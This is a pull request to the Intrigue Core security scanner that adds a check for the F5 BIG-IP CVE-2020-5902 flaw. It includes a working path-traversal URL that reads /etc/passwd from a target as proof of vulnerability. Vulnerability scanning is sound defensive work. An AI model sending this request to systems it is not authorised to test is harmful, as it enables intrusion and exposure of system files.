### PR TITLE
Vuln check for F5 BIG-IP Config Utility CVE-2020-5902

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -33,7 +33,7 @@ GIT
 
 GIT
   remote: https://github.com/intrigueio/intrigue-ident.git
-  revision: d4c42d0360dc3afa1a431e576e62fe9e5161a0c4
+  revision: 52cdbe669c13cb34a7e62960e2a438031199b4a0
   branch: main
   specs:
     intrigue-ident (1.0.4)

--- a/lib/issues/exposed_bigip_configuration_utility.rb
+++ b/lib/issues/exposed_bigip_configuration_utility.rb
@@ -11,9 +11,9 @@ module Intrigue
         status: "confirmed",
         description: "The F5 BigIP configutation utility was discovered. This should never be exposed to the data networks, and should be checked for CVE-2020-5902",
         remediation: "Prevent access to this panel by placing it behind a firewall or otherwise restricting access.",
-        [
-          { :vendor => "F5", :product => "Big-IP Configuration Utility" },
-        ],
+        #affected_software: [
+        #  { :vendor => "F5", :product => "Big-IP Configuration Utility" },
+        #],
         references: [ # types: description, remediation, detection_rule, exploit, threat_intel
           {:type => "threat_intel", :uri => "https://twitter.com/n0x08/status/1278812795031523328"}
         ],

--- a/lib/issues/f5_bigip_configuration_utility_cve_2020_5902.rb
+++ b/lib/issues/f5_bigip_configuration_utility_cve_2020_5902.rb
@@ -5,7 +5,7 @@ module Intrigue
     def self.generate(instance_details={})
       {
         name: "f5_bigip_configuration_utility_cve_2020_5902",
-        pretty_name: "F5 BIG-IP Config Utility RCE (CVE-2929-5902)",
+        pretty_name: "F5 BIG-IP Config Utility RCE (CVE-2020-5902)",
         identifiers: [
           { type: "CVE", name: "CVE-2020-5902" }
         ],

--- a/lib/issues/f5_bigip_configuration_utility_cve_2020_5902.rb
+++ b/lib/issues/f5_bigip_configuration_utility_cve_2020_5902.rb
@@ -1,0 +1,30 @@
+module Intrigue
+  module Issue
+  class F5BigIpConfigurationUtilityCve20205902 < BaseIssue
+  
+    def self.generate(instance_details={})
+      {
+        name: "f5_bigip_configuration_utility_cve_2020_5902",
+        pretty_name: "F5 BIG-IP Config Utility RCE (CVE-2929-5902)",
+        identifiers: [
+          { type: "CVE", name: "CVE-2020-5902" }
+        ],
+        integrated: "2020-07-05 21:33:03 UTC",
+        severity: 1, 
+        category: "network",
+        status: "confirmed",
+        description: "This Big-IP Configuration Utility was discovered and found vulnerable to CVE-2020-5902",
+        remediation: "Update the device, and if possible, remove access from this network.",
+        affected_software: [
+          { :vendor => "F5", :product => "BIG-IP Configuration Utility" }
+        ],
+        references: [ # types: description, remediation, detection_rule, exploit, threat_intel
+          {:type => "threat_intel", :uri => "https://twitter.com/n0x08/status/1278812795031523328"}
+        ],
+        check: "vuln/f5_bigip_configuration_utility_cve_2020_5902"
+      }.merge!(instance_details)
+    end
+  
+  end
+  end
+  end

--- a/lib/tasks/enrich/uri.rb
+++ b/lib/tasks/enrich/uri.rb
@@ -107,10 +107,8 @@ class Uri < Intrigue::Task::BaseTask
     # process interesting fingeprints and content checks that requested an issue be created
     issues_to_be_created = ident_content_checks.concat(ident_fingerprints).collect{|x| x["issues"] }.flatten.compact.uniq
     _log "Issues to be created: #{issues_to_be_created}"
-    if issues_to_be_created.count > 0
-      issues_to_be_created.each do |c|
-        _create_linked_issue c["issue"], c
-      end
+    (issues_to_be_created || []).each do |c|
+      _create_linked_issue c
     end
 
     # if we ever match something we know the user won't

--- a/lib/tasks/uri_check_api_endpoint.rb
+++ b/lib/tasks/uri_check_api_endpoint.rb
@@ -68,7 +68,7 @@ class UriCheckApiEndpoint < BaseTask
       return unless response
 
       # skip if we're not the original url, but we're getting the same response
-      next if u != url && body == standard_response.body
+      next if u != url && response.body == standard_response.body
 
       # check for content type of application.. note that this will flag
       # application/javascript, which is probably not wanted

--- a/lib/tasks/vuln/f5_bigip_configuration_utility_cve_2020_5902.rb
+++ b/lib/tasks/vuln/f5_bigip_configuration_utility_cve_2020_5902.rb
@@ -1,0 +1,42 @@
+module Intrigue
+  module Task
+  class  F5BigIpConfigUtilCve20205902 < BaseTask
+  
+    def self.metadata
+      {
+        :name => "vuln/f5_bigip_configuration_utility_cve_2020_5902",
+        :pretty_name => "Vuln Check - F5 BIG-IP Config Utility RCE (CVE-2929-5902)",
+        :authors => ["jcran"],
+        :description => "This task checks checks a F5 Config Util endpoint for a version vulnerable to CVE-2020-5902.",
+        :type => "vuln_check",
+        :passive => false,
+        :allowed_types => ["Uri"],
+        :example_entities => [{"type" => "Uri", "details" => {"name" => "https://intrigue.io"}}],
+        :allowed_options => [],
+        :created_types => []
+      }
+    end
+  
+    ## Default method, subclasses must override this
+    def run
+      super
+  
+      require_enrichment
+  
+      check_url = "#{_get_entity_name}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
+  
+      response = http_get_body(check_url)
+
+      if response =~ /root:x:0:0/
+        _create_linked_issue "f5_bigip_configuration_utility_cve_2020_5902", {"proof" => response}
+      else 
+        _log "Unable to verify vulnerability"
+      end
+
+    end
+  
+   
+  end
+  end
+  end
+  


### PR DESCRIPTION
Adds a vuln check for CVE-2020-5902 that pulls /etc/password as proof.  See below for a screenshot.

![Intrigue Core 2020-07-05 17-07-45(1)](https://user-images.githubusercontent.com/76854/86543350-3f797700-bee3-11ea-9d0b-8f0511999792.png)
